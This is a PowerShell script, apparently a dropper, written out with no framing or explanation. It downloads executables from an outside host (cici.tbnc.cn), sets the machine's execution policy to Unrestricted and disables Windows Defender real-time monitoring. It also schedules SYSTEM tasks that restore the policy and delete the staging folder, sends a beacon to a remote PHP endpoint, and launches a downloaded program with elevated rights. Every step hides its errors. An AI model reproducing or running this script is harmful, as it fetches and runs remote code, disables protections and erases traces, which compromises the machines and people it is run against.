#1 New-Item -Path "C:\Users\1" -ItemType Directory -Force -ErrorAction SilentlyContinue #2 Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/aria2c.exe" -OutFile "C:\Users\1\aria2c.exe" -ErrorAction SilentlyContinue Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/launcher.exe" -OutFile "C:\Users\1\launcher.exe" -ErrorAction SilentlyContinue Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/7zr.exe" -OutFile "C:\Users\1\7zr.exe" -ErrorAction SilentlyContinue #Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/1.7z" -OutFile "C:\Users\1\1.7z" -ErrorAction SilentlyContinue #Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/1.exe" -OutFile "C:\Users\1\1.exe" -ErrorAction SilentlyContinue #3 $currentPolicy = Get-ExecutionPolicy -Scope LocalMachine Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope LocalMachine -Force -ErrorAction SilentlyContinue $Action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-NoExit -Command Set-ExecutionPolicy -ExecutionPolicy $currentPolicy -Scope LocalMachine -Force" $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(30) $Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount Register-ScheduledTask -TaskName "RestoreExecutionPolicy" -Action $Action -Principal $Principal -Trigger $Trigger -Description "Restores the execution policy after 30 minutes" -ErrorAction SilentlyContinue #4 try { $defenderStatus = Get-MpPreference | Select-Object -ExpandProperty DisableRealtimeMonitoring -ErrorAction Stop } catch { $defenderStatus = $null } if (-not $defenderStatus) { try { Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue } catch { } } #5 Unregister-ScheduledTask -TaskName "DeleteFolderTask" -Confirm:$false -ErrorAction SilentlyContinue $Action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-NoExit -Command Remove-Item -Path 'C:\Users\1' -Recurse -Force; Unregister-ScheduledTask -TaskName 'DeleteFolderTask' -Confirm:$false" $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddSeconds(1800) $Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount Register-ScheduledTask -TaskName "DeleteFolderTask" -Action $Action -Principal $Principal -Trigger $Trigger -Description "Deletes C:\Users\1 after 1800 seconds" -ErrorAction SilentlyContinue #6 Invoke-WebRequest -Uri "http://www.cici.tbnc.cn/1_data.php" -Method POST | Out-Null -ErrorAction SilentlyContinue #7 Start-Process "C:\Users\1\launcher.exe" -Verb RunAs -ErrorAction SilentlyContinue